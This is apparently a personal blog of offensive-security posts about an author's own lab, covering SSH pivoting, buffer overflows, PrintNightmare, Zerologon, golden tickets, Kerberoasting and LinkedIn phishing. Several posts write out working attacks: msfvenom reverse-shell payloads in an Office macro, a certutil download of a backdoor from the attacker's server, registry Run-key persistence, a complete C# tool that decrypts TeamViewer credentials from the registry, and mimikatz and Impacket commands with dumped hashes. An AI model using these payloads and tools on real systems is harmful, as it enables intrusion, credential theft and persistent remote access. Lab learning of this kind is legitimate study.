[SSH Tunneling] Pivoting over networks

 Hi everyone,

To day i'm going ot teach you about three exercises that increment progressively the complexity, of pivoting technique over adjacent networks.

[Stept one easy level]

The initial network map is the following:

- We should perform one hop over the network for access from attacker machine to the target server

On the previous scenario i perform a simple SSH tunnel with a port forwarding  that allow the attaker machine connect to the target server using rdesktop protocol as you can see on my following video.

[Stept two medium level (2 hops)]

Second scenario with two jumps over the network:

On the previous scenario i perform a couple of SSH tunnels with a port forwarding  that allow the attaker machine connect to the target server using rdesktop protocol as you can see on my following video.

[Step3 hard level]

The third scenario is using a Dynamic tunnel and reverse port forwarding connection, this option allow us configure a proxychains software on the attacker machine that allow us execute an port scann with nmap over the target system:

_dynamic tunnel at local on pawned machine:

Reverse tunnel to attacker machine:

Listen port at local on attacker machine :

Proxychains configuration:

└─$ cat /etc/proxychains4.conf| grep socks

#            socks5 192.168.67.78 1080 lamer secret

# socks4 192.168.1.49 1080

#       proxy types: http, socks4, socks5

#        ( auth types supported: "basic"-http  "user/pass"-socks )

socks4 127.0.0.1 9051

NMAP port scanning example using porxychains:

──(kali㉿kali)-[~]

└─$ proxychains nmap -sT  -p 53,80,88,135,139,445,464,593,636,3389 192.168.1.48                            130 ⨯

[proxychains] config file found: /etc/proxychains4.conf

[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

[proxychains] DLL init: proxychains-ng 4.14

Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 08:18 EST

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:80  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:139  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:445  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:3389  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:53  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:135  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:80  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:636  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:464  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:593  ...  OK

[proxychains] Strict chain  ...  127.0.0.1:9051  ...  192.168.1.48:88  ...  OK

Nmap scan report for 192.168.1.48

Host is up (0.0045s latency).

PORT     STATE SERVICE

53/tcp   open  domain

80/tcp   open  http

88/tcp   open  kerberos-sec

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

464/tcp  open  kpasswd5

593/tcp  open  http-rpc-epmap

636/tcp  open  ldapssl

3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 13.10 seconds

Rdesktop connection to the target machine:

[Finally scenario] hard level 2 SSH connections + SSH tunneling Dynamic + SSH tunneling Reverse +SSH tunneling portforwarding + proxychains

And this is all for this post, enjoy !! and wee keep in touch.

f0ns1!!

 

PHISING credentials exersice with EVIL-SSDP tool over SSDP protocol

 Hi everyone!.

I explain the exercise and perform a couple of attacks using a scanner and backup device on the following video:

I hope that you enjoy with the video and learn about this protocol.

Regards, f0ns1 We keep in touch ;)

Buffer overflow SLMAIL 5.5 buffer overflow POP3

 Hi evryone !,

In this entry i show how to exploit a mail server slmail 5.5 that is vulnerable to buffer overflow:

The source code:

https://github.com/f0ns1/-Exploiting-BufferOverflow/blob/main/final_exploit_smail_5.5.py

With best regards, f0ns1

Buffer overflow webserver klibri 2.0

 

Hi evryone !,

In this entry i show how to exploit a web server Kolibri 2.0 that is vulnerable to buffer overflow:

    

The source code of the exploit:

https://github.com/f0ns1/-Exploiting-BufferOverflow/blob/main/exploit_kolibri_2_0_webserver.py

With best regards; f0ns1

Basics Buffer overflow

 

Hi everyone!!,

In this entry i explain buffer overflow smashing attack step by step Step by step:

Source code:

#include <string.h>
	#include <stdio.h>
	#
	#void do_something(char *Buffer)
	#{
	# char MyVar[128];
	# strcpy(MyVar, Buffer);
	#}
	#Main program
	#int main(int argc, char **argv)
	#{
	# do_something(argv[1]);
	# printf("Done\n");
	#}

https://github.com/f0ns1/-Exploiting-BufferOverflow/blob/main/basic_overflow.py

With best reagrds, we keep in touch !! f0ns1

Audiotran Buffer overflow [Windows]

 

Hi everyone,

This is a new entry on my personal blog about,  Buffer overflow stack smashing attack:

Video:

Source code:

https://github.com/f0ns1/-Exploiting-BufferOverflow/blob/main/auditran_exploit.py

With best regards,

f0ns1!! we keep in touch

FTP Float Exploiting: [Windows x86] Buffer Overflow [I]

 Hi everyone!,

so far so good,in this post i'm going to explain hot to exploit an RCE over Buffer overflow smash attack type.

The choosen vulnerable software is Float FTP installed over  Windows XP x86 architecture.

The software:

The connection from attacker machine:

Debugger software: Immunity Debugger with mona python plugin

Buffer Overflow exploit Source Code available on my github:

https://github.com/f0ns1/-Exploiting-BufferOverflow/tree/main

Exploit execution:

I promise create a full and deep explaination about how to create the exploit with the following stepts:

- Undesrtand the vulnerability

- Assembler quick introduction: operations/register/stack/heap

- fuzzing

- ciclycal pattern in order to obtain offset

- EIP registry control

- Shell code injection

With best regards!, i hope that you enjoy we keep in touch ;) F0ns1.

  

OSCP_labs [BBSCute] linux [II]

Linux -CuteNews 2.1.2  exploit +  Hping3 (old version) privilege escalation

OSCP_labs [infosecPrep] linux [I]

 

[Linux] easy level:

Active Directory CORPORATIVE.domain.local Series[XI] : PrintNigthmare Privelege scalation

Hi everyone!.

So far so good in this post i perform a local privilege escalation with the knowledge vulnerability of 2021.

Printnightmare

A non administrative user could create a new printer driver:

CVE-2021-1675 - CVE-2021-34527

https://github.com/ly4k/PrintNightmare

https://github.com/calebstewart/CVE-2021-1675

└─$ python3 printnightmare.py  -check  "Administrator:Passw0rd1@10.0.2.22"                            

Impacket v0.9.24.dev1+20211015.125134.c0ec6102 - Copyright 2021 SecureAuth Corporation

[*] Target appears to be vulnerable!

   

Validate sharing printers from external attacker machine to the target server:

                          

Execute privilege scalation exploit on the target system:

Verify from psexec exeternal connection using smb protocol writing on  C$:

And this is all, for this kind of attack i hope that all the companies apply the recommended vendor patches!!.

best reagrds, f0ns1

RedTeam Challenge: Project S0c14l M3d1a series[III]

 Hi everyone!,

so far so good!, in this post i'm going to explain how to perform a socialnetwork attack [Phising], with an easy tool:

https://github.com/xHak9x/SocialPhish

https://my.freenom.com/

https://tinyurl.com/app/

And this is all, for this kind of attack i hope that everyone review the urls and the links of the emails/direct messages on social networks , etc.

best reagrds, f0ns1

Active Directory CORPORATIVE.domain.local Series[X] : Zerologon attack

 Hi everyone!!,

So far so good, in this post i'm going to explain how to perform the zerologon attack over Active directory on my local company environment COOPERATIVE.DOMAIN.local

This vulnerability was detected on the las year 2020, and allow to a remote and unauthenticated attacker obtain all hashes on Windows server Active Directory target machine:

CVE-2020-1472

The first step is detected if the target system is vulnerable to this exploit, for this task is possible use the follow script develop on python:

https://github.com/SecuraBV/CVE-2020-1472

And in order to perform the attack it's possible exploit use the following exploit:

https://github.com/risksense/zerologon

Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrador:500:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CORPORATIVE.DOMAIN.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:74b9c26e436d8ceacd2db129dbed8091:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

CORPORATIVE.DOMAIN.local\worker1:1106:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\worker2:1107:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\SVC_service:1109:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\NP_user:1110:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE.DOMAIN.local\test_user:1111:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

CORPORATIVE-DOM$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

WKS-002$:1103:aad3b435b51404eeaad3b435b51404ee:26ea21a020599bf2757bdef562adbcc7:::

WKS-001$:1104:aad3b435b51404eeaad3b435b51404ee:efe101633fb3881f250d512d388cb700:::

[*] Kerberos keys grabbed

CORPORATIVE.DOMAIN.local\krbtgt:aes256-cts-hmac-sha1-96:178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e

CORPORATIVE.DOMAIN.local\krbtgt:aes128-cts-hmac-sha1-96:84edbefb34b31b613865a44d4bf66e05

CORPORATIVE.DOMAIN.local\krbtgt:des-cbc-md5:46a25ef4f8cbec0d

CORPORATIVE.DOMAIN.local\worker1:aes256-cts-hmac-sha1-96:4686da5eda179be4c46be0524b5590509408301b15a03150cc901d58dc25ea02

CORPORATIVE.DOMAIN.local\worker1:aes128-cts-hmac-sha1-96:a5272782e4809030425764777b89b377

CORPORATIVE.DOMAIN.local\worker1:des-cbc-md5:0816198940dae589

CORPORATIVE.DOMAIN.local\worker2:aes256-cts-hmac-sha1-96:fb1ac4dd6cdc58614db210da4296f60f4f76931c7ed783ba7d4c2d23ab6ae153

CORPORATIVE.DOMAIN.local\worker2:aes128-cts-hmac-sha1-96:f55967570c4b562cc3fdd696d37603cc

CORPORATIVE.DOMAIN.local\worker2:des-cbc-md5:5bb5cb23076e5eef

CORPORATIVE.DOMAIN.local\SVC_service:aes256-cts-hmac-sha1-96:53cb07135999888c62a8cf58a449cc24e89ad12c3dd5f26d373657947fc2578f

CORPORATIVE.DOMAIN.local\SVC_service:aes128-cts-hmac-sha1-96:08398a5e5779afef70121bd2fe8c5153

CORPORATIVE.DOMAIN.local\SVC_service:des-cbc-md5:5b29adb0efa81691

CORPORATIVE.DOMAIN.local\NP_user:aes256-cts-hmac-sha1-96:f537750e75139946ed51cfb8337314d127a17d3137a5ef8efec6b0becabebaac

CORPORATIVE.DOMAIN.local\NP_user:aes128-cts-hmac-sha1-96:07301297fb5aad297fb0a6b7bd2eeeed

CORPORATIVE.DOMAIN.local\NP_user:des-cbc-md5:a4296d1c2ce010c7

CORPORATIVE.DOMAIN.local\test_user:aes256-cts-hmac-sha1-96:d24ab0db83b636a6065d12d7451cbe5d8512a381caccac9e94ddd3ca2d0844d9

CORPORATIVE.DOMAIN.local\test_user:aes128-cts-hmac-sha1-96:48bf29b09e9d4753f58c9a249cc3ec4b

CORPORATIVE.DOMAIN.local\test_user:des-cbc-md5:15801c91c8a7ea29

CORPORATIVE-DOM$:aes256-cts-hmac-sha1-96:7ffab151f9fc7485b70447cab3373921338bf88906703fd5d4deb9d4a87fde16

CORPORATIVE-DOM$:aes128-cts-hmac-sha1-96:2d714652efe8aec574dd8ffce8e7ef8e

CORPORATIVE-DOM$:des-cbc-md5:a4e6b6ae5837806d

WKS-002$:aes256-cts-hmac-sha1-96:bc3ef9250185b6844385fae85f47c69e0e21f9e69a7ff2a9a5fd0fa28fdd91c9

WKS-002$:aes128-cts-hmac-sha1-96:c7431351b05123fcd6039f1611db23a4

WKS-002$:des-cbc-md5:32b6861998ba5e1c

WKS-001$:aes256-cts-hmac-sha1-96:57ee7e4e906c0fa2e8eea3b1dfadb4e6a4e036ae0c8e8b47728da431068a7efb

WKS-001$:aes128-cts-hmac-sha1-96:d34b1290f3df609fe9aa4d808004ee98

WKS-001$:des-cbc-md5:020be94686e05e07

[*] Cleaning up... 

And access using pass the hash:

 This vulnerability as you can see on the following documentation, could be exploited becaus the function: ComputeNetlogonCredential don't take a random value of IV initialitation vector during encryption symetric AES operation,

https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/

And this is all, for this kind of attack i hope that all the companies apply the recommended vendor patches!!.

best reagrds, f0ns1

 

Teamviewer Extract credentials [csharp]

 

Hi everyone,

Teamviewer extract credentials for registry:

Source code :

using System;
using System.Text;
using Microsoft.Win32;
using System.Security.Cryptography;

namespace DecryptTeamViewer
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n");

// TeamViewer version
Console.WriteLine("\r\n=== TeamViewer version ===\r\n");
Console.WriteLine(GetRegValue("TeamViewerSettings", "Version"));

// User info
Console.WriteLine("\r\n=== User Information ===\r\n");
Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName"));
Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName"));

// Proxy info
Console.WriteLine("\r\n=== Proxy Information ===\r\n");
Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP"));
Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername"));
var proxyPass = (byte[])GetRegValue("TeamViewerSettings", "ProxyPasswordAES");
Console.WriteLine("Proxy password: " + DecryptAES(proxyPass));

// Credentials

Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n");
// Options pass
var optionsPass = (byte[])GetRegValue("TeamViewerSettings", "OptionsPasswordAES");
Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass));
// Server pass
var serverPass = (byte[])GetRegValue("TeamViewerSettings", "ServerPasswordAES");
Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass));
// Security pass
var securityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordAES");
var exportedSecurityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordExported");
Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass));
Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass));
// License
var licenseKey = (byte[])GetRegValue("TeamViewerSettings", "LicenseKeyAES");
Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n");

}
public static object GetRegValue(string hive, string value)
{
// Gets registry values from TeamViewer keys
Object regKeyValue = new Object();
if (hive == "TeamViewerSettings")
{
var regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\WOW6432Node\TeamViewer\Version7", false);
if (regKey != null)
{
regKeyValue = regKey.GetValue(value);
}
return regKeyValue;
}
else if (hive == "TeamViewerUserSettings")
{
var regKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\TeamViewer\Version7", false);
if (regKey != null)
{
regKeyValue = regKey.GetValue(value);
}
return regKeyValue;
}
else
{
regKeyValue = null;
return regKeyValue;
}
}

public static string DecryptAES(byte[] encryptedPass)
{
try
{
// AES settings
Aes aes = new AesManaged
{
Mode = CipherMode.CBC,
BlockSize = 128,
KeySize = 128,
Padding = PaddingMode.Zeros
};
// TeamViewer Key & IV
byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 };
byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 };

// Decrypt AES passwords
ICryptoTransform AESDecrypt = aes.CreateDecryptor(key, IV);
if (encryptedPass != null)
{
var decrytedPass = AESDecrypt.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length);
string plaintextPass = Encoding.Unicode.GetString(decrytedPass);
return plaintextPass;
}
else
{
return null;
}
}
catch (Exception)
{
return null;
}
}

}
}

flag{

50ImuYChUng0FFl0l0l0l0

.}

Best regards, f0ns1

[hacking with python] : webpage exploit [II] Privilege scalation and persistence streaming

Hi everyone,

This is the second part of my series : [hacking with python] : webpage exploit

Hacking on streaming !!

And this is all, so easy !!!

best regards f0ns1

Active Directory CORPORATIVE.domain.local Series[IX] : GoldenTicket

 Hi eveyone!

So far so good !, On this post entry i'm going to introduce yourself to exploit Active Directory directly to Domain Controller obtainng a golde tocket, This  kind of attck exploit directly to KDC (Kerberos Domain Controller), to obtain a ticket that provide to us a full persistence with administative privileges during ten years.

It's completely needed be performed this attack with administrator privileges on the Windows Active Directory.

1. EXPLOITATION:

    1.1 SHARE MIMIKATZ 

        kali@kali:~/Descargas/x64$ python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -

10.0.2.17 - - [19/Sep/2021 23:53:05] "GET /mimikatz.exe HTTP/1.1" 200 -

    1.2 OBTAIN MIMITAKZ BINARY

        

            

        C:\Users\worker2\golden_ticket>certutil.exe -urlcache -f http://10.0.2.19:8989/mimikatz.exe mimikatz.exexe

****  En línea  ****

CertUtil: -URLCache comando completado correctamente.

C:\Users\worker2\golden_ticket>dir

 El volumen de la unidad C no tiene etiqueta.

 El número de serie del volumen es: BE72-396A

 Directorio de C:\Users\worker2\golden_ticket

20/09/2021  17:05    <DIR>          .

20/09/2021  17:05    <DIR>          ..

20/09/2021  17:05         1.355.680 mimikatz.exexe

               1 archivos      1.355.680 bytes

               2 dirs   3.095.617.536 bytes libres

C:\Users\worker2\golden_ticket>

PS C:\Users\Administrador> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::lsa /inject /name:krbtgt

Domain : CORPORATIVE / S-1-5-21-2048228633-4105951457-1013245227

RID  : 000001f6 (502)

User : krbtgt

 * Primary

    NTLM : 74b9c26e436d8ceacd2db129dbed8091

    LM   :

  Hash NTLM: 74b9c26e436d8ceacd2db129dbed8091

    ntlm- 0: 74b9c26e436d8ceacd2db129dbed8091

    lm  - 0: 0b85525f2bc07e8ddad5bc5116cda6be

 * WDigest

    01  529e053364e99c40018a763d093cd2d0

    02  0f153570e5bfc1beaf7af4548fe55407

    03  a2e7ca6217279efd9902dfec4f9c1ffc

    04  529e053364e99c40018a763d093cd2d0

    05  0f153570e5bfc1beaf7af4548fe55407

    06  a65e056b499477f816ceba51675d9710

    07  529e053364e99c40018a763d093cd2d0

    08  1afdffdfbb1a96b9eac70bf7c56c9918

    09  324a2bb9f95d144266eb7bccbe84e5ba

    10  560e55940f267584289f89a10c3a6a56

    11  c05c279a357cd56256c778bf63d45005

    12  324a2bb9f95d144266eb7bccbe84e5ba

    13  4d711b818095960a87259fa4fe347d3a

    14  c05c279a357cd56256c778bf63d45005

    15  080bb5dadc9fda118ed49eb23b1dec81

    16  c3c6dfa2a8c55fe7bd5460d3950d9cce

    17  dd4ec696ec2268f292b30966168ba6d2

    18  20bf77d7ae1c83731480dd3d58b83ead

    19  aa99179fb3b127c835e5c88014d5094f

    20  a94702c74ded36fba7260a834ae0a6ee

    21  c4c9af7a348d2321b2a366d16e26fc31

    22  c4c9af7a348d2321b2a366d16e26fc31

    23  0bac9a385f379934e709b3b9f2e1a6ee

    24  2b72cae08c1e9fb1c73e32b2418f237c

    25  127f40e154898bb85c338eed76bf7b28

    26  524d56073be5780737d7ffc2ed602391

    27  035dd1bc3fec5eacd425087efaefa33a

    28  d62ace76ae0c72b115a5f75d421c10cd

    29  9b274c0df827c3cf78d946c7d2f2a5a2

 * Kerberos

    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt

    Credentials

      des_cbc_md5       : 46a25ef4f8cbec0d

 * Kerberos-Newer-Keys

    Default Salt : CORPORATIVE.DOMAIN.LOCALkrbtgt

    Default Iterations : 4096

    Credentials

      aes256_hmac       (4096) : 178c2ad109c08f5f1396f956f899e65c8e3ca03e77ea180584e5b0c5ed5cd25e

      aes128_hmac       (4096) : 84edbefb34b31b613865a44d4bf66e05

      des_cbc_md5       (4096) : 46a25ef4f8cbec0d

 * NTLM-Strong-NTOWF

    Random Value : f155a5de1b36973934e6291d7cc9c252

Generate golden ticket (KIRBI):

mimikatz # kerberos::golden /user:Administrador /domain:CORPORATIVE.DOMAIN.local /sid:S-1-5-21-2048228633-4105951457-101

3245227 /krbtgt:74b9c26e436d8ceacd2db129dbed8091 /ticket:ticket

User      : Administrador

Domain    : CORPORATIVE.DOMAIN.local (CORPORATIVE)

SID       : S-1-5-21-2048228633-4105951457-1013245227

User Id   : 500

Groups Id : *513 512 520 518 519

ServiceKey: 74b9c26e436d8ceacd2db129dbed8091 - rc4_hmac_nt

Lifetime  : 20/09/2021 16:52:13 ; 18/09/2031 16:52:13 ; 18/09/2031 16:52:13

-> Ticket : ticket

 * PAC generated

 * PAC signed

 * EncTicketPart generated

 * EncTicketPart encrypted

 * KrbCred generated

Final Ticket Saved to file !

List the ticket file:

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac

   Start/End/MaxRenew: 20/09/2021 16:42:45 ; 21/09/2021 2:42:45 ; 27/09/2021 16:42:45

   Server Name       : krbtgt/CORPORATIVE.DOMAIN.LOCAL @ CORPORATIVE.DOMAIN.LOCAL

   Client Name       : Administrador @ CORPORATIVE.DOMAIN.LOCAL

   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

Share smbfolder from kali attaker machine:

 And copy ticket content:

C:\Users\Administrador>copy ticket \\10.0.2.19\smbfolder\

        1 archivo(s) copiado(s).

1.3 GOLDEN TICKET (CCACHE ):

Execute ticketer.py tool for obtain a ccache file:

 

List Ccache file:

root@kali:/home/kali/Master/lab4/test/data# ls -ltrh f0ns1*

-rw-r--r-- 1 root root 1,1K sep 27 20:54 f0ns1.ccache

 

Export environment variable:

export KRB5CCNAME=’f0ns1.ccache’

 

Access with f0ns1 user as nt Authority\system without credentials:

And this is all, for last Active directory attack, I hope that you enjoy with my nineth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

Rogue Servers: network attacks FTP series [I]

 Hi every one,

So far so good, today we are going to perform a network local attack using rogue servers on with auxiliary modules of metasploit framework.

Type of attack FTP server:

    - The flag is capture the user  credentials.

Attack one:

    - Directly connection between victim and attacker server (test ftp capture credentials)

Attack two:

    - ARP spoofing with my own hacking python tool:

    https://github.com/f0ns1/evilHackingPythonTool

    - DNS spoofing with an other python hacking tool:

    https://github.com/f0ns1/mitm_process.py

    - Spoofing connection between client and "fake" web ftp server:

And this is all for this, kind of ftp network server attack.

I hope that, this attack could be helpful for you and enjoy.

regards, f0ns1.

[hacking with python] : webpage exploit

 

    

SOURCE CODE :

source code github

RedTeam Challenge: Project S0c14l M3d1a series[II]

 Hi everyone,

In this step we are going to make a malicious office file that contains embedded malware using an easy techniques.

Attack context is a trojan file that execute a malware internally during a file visualization or edit by the target user.

GENEARTE MALICIOUS PAYLOAD:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=9999 -f vba > payload2.vba

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of vba file: 2626 bytes

The first step is create a malicious payload with msfvenom tool on the attacker machine the output format should be vba file.This type of extension file belong to Microsoft office macros scripting software on windows.

GENERATE DOCUMENT:

I use "Macro pack" tool for inject the previous malicious payload on the trojan document:

The document file looks like a normal Microsoft office word document:

EDIT AND SEND DOCUMENT:

This is the moment of edit the document with the information that you want, for example a job opportunity:

WAIT FOR RESPONSE:

And form the attacker side yoo only need wait for response on the chosen in the malicious payload and enjoy:

PERSISTENCE:

1. From the attacker machine obtain generate a new payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=6969 -f exe > backdoor.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of exe file: 73802 bytes

The previous command generate an executable windows file with name backdoor and extension ".exe"

2. From the attacker machine launch a http server with python3 for share the exe file with the target machine:

python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

3. From the target machine, download the binary file with certutil:

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

****  En l�nea  ****

CertUtil: -URLCache comando completado correctamente.

4. Modify registry on the target machine for persistence operation:

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v persistence2 /t REG_SZ 

/d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \"start-process  $env:APPDATA\backdor.exe\"

And this is all, for every reboot of the target machine and login by the powned user : 

The binary backdor.exe it's going to be execute byitself and this binary spawn cmd to the attacker machine.

And this is all for my first RedTeam challenge execution "step 2", I hope that you'll share with me this challenge on the next days and we keep in touch.

with best regards, f0ns1

RedTeam Challenge: Project S0c14l M3d1a series[I]

Hi everyone,

So  far so good, in this case i'm going to challenge myself with a new project that belong to a RedTeam. 

I want to advise everybady that this content don't directly belong to the OSCP certification, but it's allow me implements and assembly my hacking knowleges that i learned before in my academic and laboral life.

For me it's amazing!, because nobady explained to me how to do that project and could be very usefull and so visual example that how to a real attacker could access to your company network, get admin credentials and steal your data.

PROJECT STRUCTURE

Every Project should be start with a timing definition and structures:

ATTACK ARCHITECTURE

This is a high level attack architecture definition:

TARGETS DEFINITION:

    - Social Media: Linkedin

    - Company: CORPORATIVE.domain.local 

    - User: Member of company (I want a new Job)

    

   

    - Type of attack: contact with the target user with inmail private  message/ attach malicious file 

   

OBJETIVES OF REDTEAM CAMPAING:

There are a couple of ofjectives, external and internal:

    - The internal objetive is compromise the user and finally the company if it's possible.

    - The external objective is learn about cybersecurty, explain my knoledges and advise every people that usually use this kind of laboral social media.

And this is all for my first RedTeam challenge execution, I hope that you'll share with me this challenge on the next days and we keep in touch.

with best regards, f0ns1

Active Directory CORPORATIVE.domain.local Series[VIII] : Kerberoasting && AS-REP-Roasting attacks

Hi everyone!,

So far so good, In this post, i'm going to introduce yourself an other couple of Active directory attacks famous . Kerberoasting and AS-REP-Roasting.

This kind of attacks, are performance directly from the attacker side (kali linux machine) to Domian Controller of CORPORATIVE.DOMAIN.local environment:

1. KERBEROASTING ATTACK

The kerberoasting attack is performed directly to an existing account of the target domain that has the SPN configured and enable.

For more information about SPN (Service Principal Name), you could read the following link:

 https://docs.microsoft.com/es-es/archive/blogs/autz_auth_stuff/what-is-a-spn-and-why-should-you-care

1.1 Kerberoasting detection:

Using the GetUserSPNs.py tool, from the attacker machine side with a domain user and calid credentials, we can obtain the vulnerable users to kerberoasting attack.

1.2 Prerequisite:

Configure a vulnerable user to kerberoasting attack from on your domain controller:

- Create new user for this kind of attack:

- Set SPN to the target user:

1.3 Kerberoasting exploitation:

- Using the previous Impacket script is possible detect the new user with Service Principal Name, that it's going to be the target domain user for the attack exploitation:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py CORPORATIVE.DOMAIN.local/worker2:Passw0rd1

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName                                     Name         MemberOf                                                                                       PasswordLastSet             LastLogon  Delegation 

-------------------------------------------------------  -----------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  ----------

CORPORATIVE.DOMAIN.local/SVC_service.CORPORATIVE-DOMAIN  SVC_service  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 14:19:22.218200  <never>               

- TGS Hash request:

- Perform an offline dictionary attack:

 kali@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=KRB5TGS tgs_hash 

Using default input encoding: UTF-8

Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])

Will run 6 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

Passw0rd1        (?)

1g 0:00:20:47 DONE (2021-09-19 15:24) 0.000801g/s 2502Kp/s 2502Kc/s 2502KC/s Passw0r0831..Passw0rd12312

Use the "--show" option to display all of the cracked passwords reliably

Session completed

And finally validate login for a new user:

kali@kali:~$ crackmapexec smb 10.0.2.1/24 -u"SVC_service" -p"Passw0rd1"

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\SVC_service:Passw0rd1 (Pwn3d!)

2. AS-REP-ROASTING ATTACK

